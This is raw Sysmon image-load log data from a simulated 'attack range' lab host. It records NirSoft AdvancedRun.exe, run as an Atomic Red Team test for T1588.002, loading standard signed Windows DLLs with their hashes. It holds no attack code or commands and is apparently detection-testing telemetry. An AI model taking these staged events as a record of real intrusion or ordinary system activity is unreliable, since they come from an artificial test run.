734700x80000000000000003983697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003983655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.303{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 